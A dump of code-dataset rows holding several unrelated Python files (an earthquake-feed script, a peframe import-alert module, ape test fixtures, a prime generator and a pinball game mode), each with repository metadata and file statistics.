print '%2.1f' % i['properties']['mag'] + ',', i['properties']['place'], '\n'
print 'Depth: ' + str(i['geometry']['coordinates'][2]) + 'km'
print '*' * 20
def main():
parser = get_parser()
args = parser.parse_args()
intro_statement = '\n\nSearching for Global Earthquake Events'
if args.timeframe:
t = args.timeframe
intro_statement += ' within the last {}...'.format(t)
else:
intro_statement += ' (No timespan selected, using default: 1 week)'
t = 'week'
print intro_statement
if args.magnitude:
mag = args.magnitude
print '\nMagnitude requested: {}'.format(mag)
if mag >= 4.5:
mag = 4.5
elif mag > 2.5:
mag = 2.5
else:
mag = 1.0 # anything less than 2.5 gets the 1.0+ range
else:
print '\nNo Magnitude requested, using default... (2.5+)'
mag = 2.5 # a medium sized default
# Now grab your data
api_url = 'http://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/{}_{}.geojson'.format(mag, t)
try:
data = get_data_from_api(api_url)
except urllib2.URLError:
print '\nUH OH! We were unable to extract any data! \n\n\t-->Check your Internet/WiFi Access? '
exit(1)
if data and args.savejson:
request_params = '{}mag-1{}'.format(mag, t)
save_json_data(data, request_params)
elif data:
print_results(data, mag)
if __name__ == '__main__':
main()
| 25.395062 | 113 | 0.564657 | 518 | 4,114 | 4.337838 | 0.368726 | 0.032043 | 0.028482 | 0.012461 | 0.006231 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021103 | 0.285853 | 4,114 | 161 | 114 | 25.552795 | 0.743703 | 0.025523 | 0 | 0.059524 | 0 | 0.02381 | 0.251521 | 0.009888 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.047619 | null | null | 0.178571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
312a5215e0e355ad2b4d5e01dca1809280fd23f6 | 647 | py | Python | peframe/modules/apialert.py | ki1556ki/MJUOpenSource | 4087db825bbc7c460f8275428703e5c7066a84ae | [
"MIT"
] | null | null | null | peframe/modules/apialert.py | ki1556ki/MJUOpenSource | 4087db825bbc7c460f8275428703e5c7066a84ae | [
"MIT"
] | null | null | null | peframe/modules/apialert.py | ki1556ki/MJUOpenSource | 4087db825bbc7c460f8275428703e5c7066a84ae | [
"MIT"
] | 1 | 2020-07-14T03:39:06.000Z | 2020-07-14T03:39:06.000Z | # -*- coding: utf-8 -*-
# json 형식 사용을 위한 임폴트
import json
# get함수, 각각의 반복문을 통해 apialert_found안에 문자열 삽입후 리스트형식으로 정렬하여 리턴값 반환.
def get(pe, strings_match):
alerts = strings_match['apialert']
apialert_found = []
# pe에 DIRECTORY_ENTRY_IMPORT라는 변수가 있는지 확인하여 있으면 참 없으면 거짓.
if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):
for lib in pe.DIRECTORY_ENTRY_IMPORT:
for imp in lib.imports:
for alert in alerts:
if alert: # remove 'null'
# imp.name의 문자열안에 alert의 문자열이 있을경우 apialert_found안의 맨뒤에 imp.name을 넣음
if str(imp.name).startswith(alert):
apialert_found.append(imp.name)
return sorted(set(apialert_found))
| 32.35 | 75 | 0.693972 | 98 | 647 | 4.44898 | 0.663265 | 0.08945 | 0.073395 | 0.100917 | 0.114679 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001965 | 0.213292 | 647 | 19 | 76 | 34.052632 | 0.854617 | 0.374034 | 0 | 0 | 0 | 0 | 0.079156 | 0.058047 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
312bfac4cf2875d133c13b3a00e0ae85f3c76c44 | 2,084 | py | Python | tests/conftest.py | Ninjagod1251/ape | 9b40ef15f25362ddb83cb6d571d60cab041fce4a | [
"Apache-2.0"
] | null | null | null | tests/conftest.py | Ninjagod1251/ape | 9b40ef15f25362ddb83cb6d571d60cab041fce4a | [
"Apache-2.0"
] | null | null | null | tests/conftest.py | Ninjagod1251/ape | 9b40ef15f25362ddb83cb6d571d60cab041fce4a | [
"Apache-2.0"
] | null | null | null | import shutil
from pathlib import Path
from tempfile import mkdtemp
import pytest
from click.testing import CliRunner
import ape
# NOTE: Ensure that we don't use local paths for these
ape.config.DATA_FOLDER = Path(mkdtemp()).resolve()
ape.config.PROJECT_FOLDER = Path(mkdtemp()).resolve()
@pytest.fixture(scope="session")
def config():
yield ape.config
@pytest.fixture(scope="session")
def data_folder(config):
yield config.DATA_FOLDER
@pytest.fixture(scope="session")
def plugin_manager():
yield ape.networks.plugin_manager
@pytest.fixture(scope="session")
def accounts():
yield ape.accounts
@pytest.fixture(scope="session")
def compilers():
yield ape.compilers
@pytest.fixture(scope="session")
def networks():
yield ape.networks
@pytest.fixture(scope="session")
def chain():
yield ape.chain
@pytest.fixture(scope="session")
def project_folder(config):
yield config.PROJECT_FOLDER
@pytest.fixture(scope="session")
def project(config):
yield ape.Project(config.PROJECT_FOLDER)
@pytest.fixture
def keyparams():
# NOTE: password is 'a'
return {
"address": "7e5f4552091a69125d5dfcb7b8c2659029395bdf",
"crypto": {
"cipher": "aes-128-ctr",
"cipherparams": {"iv": "7bc492fb5dca4fe80fd47645b2aad0ff"},
"ciphertext": "43beb65018a35c31494f642ec535315897634b021d7ec5bb8e0e2172387e2812",
"kdf": "scrypt",
"kdfparams": {
"dklen": 32,
"n": 262144,
"r": 1,
"p": 8,
"salt": "4b127cb5ddbc0b3bd0cc0d2ef9a89bec",
},
"mac": "6a1d520975a031e11fc16cff610f5ae7476bcae4f2f598bc59ccffeae33b1caa",
},
"id": "ee424db9-da20-405d-bd75-e609d3e2b4ad",
"version": 3,
}
@pytest.fixture
def temp_accounts_path(config):
path = Path(config.DATA_FOLDER) / "accounts"
path.mkdir(exist_ok=True, parents=True)
yield path
if path.exists():
shutil.rmtree(path)
@pytest.fixture
def runner(project):
yield CliRunner()
| 21.265306 | 93 | 0.65739 | 217 | 2,084 | 6.253456 | 0.410138 | 0.114959 | 0.119381 | 0.165807 | 0.238025 | 0.081061 | 0 | 0 | 0 | 0 | 0 | 0.101778 | 0.21737 | 2,084 | 97 | 94 | 21.484536 | 0.730227 | 0.035509 | 0 | 0.181818 | 0 | 0 | 0.216741 | 0.133533 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0.015152 | 0.287879 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
312c17d992442c57e3032d03093f0ff6832854f9 | 1,053 | py | Python | recipes/Python/576543_Prime_Number_Generator_Checker/recipe-576543.py | tdiprima/code | 61a74f5f93da087d27c70b2efe779ac6bd2a3b4f | [
"MIT"
] | 2,023 | 2017-07-29T09:34:46.000Z | 2022-03-24T08:00:45.000Z | recipes/Python/576543_Prime_Number_Generator_Checker/recipe-576543.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 32 | 2017-09-02T17:20:08.000Z | 2022-02-11T17:49:37.000Z | recipes/Python/576543_Prime_Number_Generator_Checker/recipe-576543.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 780 | 2017-07-28T19:23:28.000Z | 2022-03-25T20:39:41.000Z | #
# prime number generator
# This program gets two number as input
# and prints
# Prime numbers in the range
# Actual number of primes in the range
# and Estimation based on formula
# n
# pi(n)= -------
# log(n)
# pi(n)=number of primes less than n
#
from math import *
def isPrime(n):
if n%2==0 and n!=2:return False #if number is EVEN AND it is NOT 2
k = n**0.5 ; m = ceil(k) #if number is PERFECT SQUARE
if k==m:return False
for i in xrange(3,int(m),2): #divisibility test ODDS ONLY
if n%i==0:return False
return True #otherwise it is PRIME
if __name__=='__main__':
s = input('Enter Start: ')
e = input('Enter End: ')
s|=1 #if s%2==0:s+=1 # ODDS only
list = [x for x in range(s,e,2) if isPrime(x)]
print list,'\n',len(list),'\n',int(ceil(e/log(e)-s/log(s)))
#prints list of primes , length of list , estimate using the formula
| 30.970588 | 73 | 0.531814 | 165 | 1,053 | 3.345455 | 0.442424 | 0.043478 | 0.036232 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020438 | 0.349478 | 1,053 | 33 | 74 | 31.909091 | 0.785401 | 0.474834 | 0 | 0 | 0 | 0 | 0.071295 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.071429 | null | null | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
31305c3885e35daac8ecf91b5ede410dc7a3d63d | 5,497 | py | Python | my_modes/ChaseLoop.py | mjocean/T2Game | d85d1a9b9adb1e3836548ea60befac02b0907f6f | [
"MIT"
] | null | null | null | my_modes/ChaseLoop.py | mjocean/T2Game | d85d1a9b9adb1e3836548ea60befac02b0907f6f | [
"MIT"
] | null | null | null | my_modes/ChaseLoop.py | mjocean/T2Game | d85d1a9b9adb1e3836548ea60befac02b0907f6f | [
"MIT"
] | null | null | null | import procgame.game
from procgame.game import AdvancedMode
import logging
class ChaseLoop(procgame.game.AdvancedMode):
"""
Example of T2 "Chase Loop" functionality
(described in the rules PDF on page J)
TODO: Sound effects, other visual feedback??
"""
def __init__(self, game):
super(ChaseLoop, self).__init__(game=game, priority=30, mode_type=AdvancedMode.Game)
# useful to set-up a custom logger so it's easier to track debugging messages for this mode
self.logger = logging.getLogger('ChaseLoop')
# the names of the progress lamps as a list for easier code
# via indexing, later
self.chase_lamps = ["twofiftyK", "fivehunK", "sevenfiftyK",
"oneMil", "threeMil", "fiveMil"]
self.collected = 0 # the number the player already has
self.loop_seq = [False, False, False, False]
self.awards = [250000, 500000, 750000, 1000000, 3000000, 5000000] # the list of awards
pass
def evt_player_added(self, player):
player.setState('chase_current',0)
def evt_ball_starting(self):
self.cancel_delayed(name="disabler")
self.mid_switches = [False, False, False]
self.collected = 0 # progress resets on new ball
self.sync_lamps_to_progress()
self.loop_seq = [False, False, False, False]
def evt_ball_ending(self, (shoot_again, last_ball)):
self.cancel_delayed(name="disabler")
def debug(self):
# self.logger.info("escL: %d, escH: %d, clH:%d, clL:%d" % (self.game.switches.escapeL.hw_timestamp, self.game.switches.escapeH.hw_timestamp, self.game.switches.chaseLoopHigh.hw_timestamp, self.game.switches.chaseLoopLow.hw_timestamp))
self.logger.info("collected = %d" % (self.collected))
def sw_chaseLoopLow_active(self, sw):
self.seq_handler(0)
def sw_chaseLoopHigh_active(self, sw):
self.seq_handler(1)
def sw_escapeH_active(self, sw):
self.seq_handler(2)
def sw_escapeL_active(self, sw):
if(self.seq_handler(3)):
# loop complete
self.chase_loop_award()
self.loop_seq = [False, False, False, False]
def seq_handler(self, num):
self.cancel_delayed(name="clear_%d" % num)
# if a previous switch is False, no sequence
if(False in self.loop_seq[0:num]):
self.logger.info("saw later switch -- sequence destroyed")
for i in range(0,num):
self.reset_switch_memory(i)
self.loop_seq[num] = False
self.logger.info("hit %d | Sequence: %s" % (num, self.loop_seq))
return False
self.loop_seq[num] = True
# clear later switches
for i in range(num+1,4):
self.reset_switch_memory(i)
self.logger.info("hit %d | Sequence: %s" % (num, self.loop_seq))
if(num!=3):
self.delay(name="clear_%d" % num, delay=4.0, handler=self.reset_switch_memory, param=num)
return True
def reset_switch_memory(self, switch_num):
self.cancel_delayed(name="clear_%d" % switch_num)
if(self.loop_seq[switch_num] == False):
return # nothing to do
self.loop_seq[switch_num] = False
self.logger.info("RESET %d | Sequence: %s" % (switch_num, self.loop_seq))
def OFF_sw_escapeL_active(self, sw):
self.debug()
if(self.game.switches.chaseLoopLow.hw_timestamp == None):
return procgame.game.SwitchContinue
if (((self.game.switches.escapeL.hw_timestamp - self.game.switches.chaseLoopLow.hw_timestamp) < 2000) and
(self.game.switches.escapeL.hw_timestamp > self.game.switches.escapeH.hw_timestamp) and
(self.game.switches.escapeH.hw_timestamp > self.game.switches.chaseLoopHigh.hw_timestamp) and
(self.game.switches.chaseLoopHigh.hw_timestamp > self.game.switches.chaseLoopLow.hw_timestamp)):
self.chase_loop_award()
return procgame.game.SwitchStop
else:
return procgame.game.SwitchContinue
def chase_loop_award(self):
self.sync_lamps_to_progress(special=self.collected)
self.game.displayText("Chase Loop " + str(self.awards[self.collected]))
self.game.score(self.awards[self.collected])
if(self.collected < len(self.chase_lamps)-1):
self.collected += 1
else:
# already got them all
pass
self.debug()
self.delay(name="lamp_sync", delay=1.0, handler=self.sync_lamps_to_progress)
def disable_progress_lamps(self):
for l in self.chase_lamps:
self.game.lamps[l].disable()
def set_lamp(self, lamp_name, state):
l = self.game.lamps[lamp_name]
if(state==0):
l.disable()
elif(state==1):
l.enable()
elif(state==2):
l.schedule(0xff00ff00)
elif(state==3):
l.schedule(0xf0f0f0f0)
def sync_lamps_to_progress(self, special=None):
self.cancel_delayed(name="lamp_sync")
for i in range(0, len(self.chase_lamps)):
l_state = 0
if(special is not None and i==special):
l_state=3
elif(self.collected>i):
l_state = 1
elif(self.collected==i):
l_state = 2
self.logger.info("setting " + self.chase_lamps[i] + " to " + str(l_state))
self.set_lamp(self.chase_lamps[i], l_state)
| 36.646667 | 242 | 0.62525 | 721 | 5,497 | 4.603329 | 0.238558 | 0.043387 | 0.062669 | 0.040072 | 0.360651 | 0.288942 | 0.207894 | 0.180476 | 0.153058 | 0.137993 | 0 | 0.020398 | 0.259778 | 5,497 | 149 | 243 | 36.892617 | 0.795281 | 0.108059 | 0 | 0.201923 | 0 | 0 | 0.056775 | 0 | 0 | 0 | 0.004221 | 0.006711 | 0 | 0 | null | null | 0.019231 | 0.028846 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.